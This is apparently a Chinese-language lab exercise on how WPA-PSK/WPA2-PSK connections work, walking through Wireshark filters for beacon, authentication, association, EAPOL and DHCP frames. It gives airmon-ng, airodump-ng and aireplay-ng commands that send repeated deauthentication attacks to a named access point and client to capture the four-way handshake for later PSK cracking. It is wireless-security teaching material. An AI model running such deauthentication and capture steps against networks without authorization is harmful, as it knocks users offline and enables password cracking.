实验目的

掌握WPA-PSK/WPA2-PSK工作原理。
利用wireshark过滤器分析整个流程,特别是四次握手的过程。
熟悉捕获四次握手中哪些Message之后才能进行PSK破解。

实验环境

Kali操作系统及相关工具
无线网卡
无线AP

实验原理

WPA-PSK连接过程:

  1. Open System Authentication (Request initiate by client)

  2. Open system Authentication (Response by AP)

  3. Association Request (sent by client)

  4. Association Response (send by AP)

  5. 4-Way Handshake – EAPoL Key Exchange Message 1

  6. 4-Way Handshake – EAPoL Key Exchange Message 2

  7. 4-Way Handshake – EAPoL Key Exchange Message 3

  8. 4-Way Handshake – EAPoL Key Exchange Message 4

  9. DHCP Discover (send by client to L2 broadcast)

  10. DHCP Offer (send by DHCP server)

  11. DHCP Reqeust (send by client to L2 broadcast)

  12. DHCP ACK (send by DHCP server to client)

实验过程

请自行针对某WPA-PSK的AP进行抓包,并用客户端连接AP,然后用过滤器语法分析整个PSK连接过程。


1,打开无线网卡监听模式。

airmon-ng start wlan0   

2,用airodump-ng抓包,找到目标AP。

airodump-ng wlan0mon   

3,针对某个AP进行抓包,并保存。

airodump-ng wlan0mon -c 11 --bssid 78:A3:51:15:67:C6 -w handshake

4,用客户端连接AP。
5,发起多次DEAUTH攻击,抓四次握手包。

aireplay-ng -0 10 -a 78:A3:51:15:67:C6 -c 0E:7F:6D:E0:E0:F5 wlan0mon

78:A3:51:15:67:C6 是要攻击的Wi-Fi的bssid

0E:7F:6D:E0:E0:F5 是已经连接的设备的bssid

6,用wireshark过滤器分析信标帧Beacons、认证Authentication、连接请求Association Request 、 连接回应Association Response 、四次握手和获取DHCP的过程。

比如:四次握手中每条Message含有随机数的情况以及报文中是否有MIC值。
进一步的,请思考是否只有捕获完整的四次握手才能进行PSK破解?


用wlan.fc.type_subtype==0X0B显示过滤捕获文件中所有的身份认证数据包。AUTH认证类型有两种,0表示开放式,1表示共享式。
WPA/WPA2是开放式认证。

用wlan.fc.type_subtype==0X08进行过滤,只显示Beacons帧。 可以查看ESSID和BSSID和工作的信道。

同时,在信标帧也可查看AP使用的加密方式。
使用WPA加密的AP,在捕获包中即可看到WPA Information Element信息。如果使用 WEP加密,将不会出现WPA Information Element信息。同时可以看到AP具有WPS功能,并且启用了WPS功能(configured)

用wlan.fc.type_subtype==0X00过滤关联请求,可以找出与客户端连接的AP 。

如图,可以看到AP的MAC地址、客户端的MAC地址和AP的ESSID。


输入eapol可以过滤握手包。

注:并不需要解密就能查看DHCP ACK数据包中的相关信息。

评论